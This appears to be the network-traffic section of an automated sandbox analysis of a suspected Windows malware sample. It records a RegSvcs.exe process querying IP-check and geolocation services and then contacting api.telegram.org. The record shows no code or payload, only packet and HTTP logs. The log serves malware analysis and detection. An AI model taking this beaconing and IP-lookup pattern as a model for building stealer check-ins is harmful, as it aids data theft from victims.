                                                                                                        Dec 18, 2024 00:30:48.427099943 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:48.433233023 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:48.552920103 CET8049780132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:52.839638948 CET8049780132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:52.853719950 CET4976980192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:52.885354996 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:53.063038111 CET8049769132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:53.063132048 CET4976980192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:53.063807011 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:53.063904047 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:53.064002037 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:53.064475060 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:53.064511061 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.437153101 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.437285900 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.440937996 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.440968990 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.441242933 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.442538023 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.483385086 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.940376997 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.940439939 CET44349791149.154.167.220192.168.2.5
                                                                                                        Dec 18, 2024 00:30:54.940669060 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:30:54.940886974 CET49791443192.168.2.5149.154.167.220
                                                                                                        Dec 18, 2024 00:31:09.359272957 CET4973380192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:31:57.838831902 CET8049780132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:31:57.839086056 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:32:32.854612112 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:32:32.974344015 CET8049780132.226.8.169192.168.2.5

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 00:30:07.337650061 CET5245853192.168.2.51.1.1.1
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET53524581.1.1.1192.168.2.5
                                                                                                        Dec 18, 2024 00:30:24.593772888 CET6100953192.168.2.51.1.1.1
                                                                                                        Dec 18, 2024 00:30:24.952507019 CET53610091.1.1.1192.168.2.5
                                                                                                        Dec 18, 2024 00:30:52.853662014 CET5110953192.168.2.51.1.1.1
                                                                                                        Dec 18, 2024 00:30:53.063066959 CET53511091.1.1.1192.168.2.5

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 00:30:07.337650061 CET192.168.2.51.1.1.10xb410Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:24.593772888 CET192.168.2.51.1.1.10xd0dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:52.853662014 CET192.168.2.51.1.1.10xd45Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET1.1.1.1192.168.2.50xb410No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET1.1.1.1192.168.2.50xb410No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET1.1.1.1192.168.2.50xb410No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET1.1.1.1192.168.2.50xb410No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET1.1.1.1192.168.2.50xb410No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:07.474836111 CET1.1.1.1192.168.2.50xb410No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:24.952507019 CET1.1.1.1192.168.2.50xd0dNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:24.952507019 CET1.1.1.1192.168.2.50xd0dNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 00:30:53.063066959 CET1.1.1.1192.168.2.50xd45No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • reallyfreegeoip.org
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.549704132.226.8.169805908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 00:30:07.603033066 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 00:30:14.667406082 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:14 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Dec 18, 2024 00:30:14.674053907 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Dec 18, 2024 00:30:18.200440884 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Tue, 17 Dec 2024 23:30:17 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                        Dec 18, 2024 00:30:18.217727900 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Dec 18, 2024 00:30:21.703111887 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Tue, 17 Dec 2024 23:30:21 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                        Dec 18, 2024 00:30:21.706195116 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Dec 18, 2024 00:30:24.529366970 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:24 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Dec 18, 2024 00:30:26.666933060 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Dec 18, 2024 00:30:28.088547945 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.549733132.226.8.169805908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 00:30:29.993885040 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Dec 18, 2024 00:30:34.385238886 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Tue, 17 Dec 2024 23:30:34 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.549744132.226.8.169805908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 00:30:34.511796951 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 00:30:40.511976957 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Tue, 17 Dec 2024 23:30:40 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                        Dec 18, 2024 00:30:40.517021894 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Dec 18, 2024 00:30:42.104749918 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:41 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.549769132.226.8.169805908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 00:30:43.902118921 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 00:30:48.299925089 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Tue, 17 Dec 2024 23:30:48 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.549780132.226.8.169805908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 00:30:48.433233023 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 00:30:52.839638948 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Tue, 17 Dec 2024 23:30:52 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.549719172.67.177.1344435908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-17 23:30:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-17 23:30:26 UTC878INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:26 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 362
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 466995
                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALGJmEYulqEzxrgtQcBGnXEbFn%2Bf7RrDuoMXri%2Fb7UrO6ihRkoDGThffpumCSiUO7oJDzav4DxEsPs15Ha7IOJOQEyMErNWTNBBESi%2FQWsIbte0ti%2Fnq83VRAWGfdyixaMHmku2L"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f3ab3737f2c7d0c-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2009&rtt_var=768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1410628&cwnd=156&unsent_bytes=0&cid=a646050f7f3b0e72&ts=460&x=0"
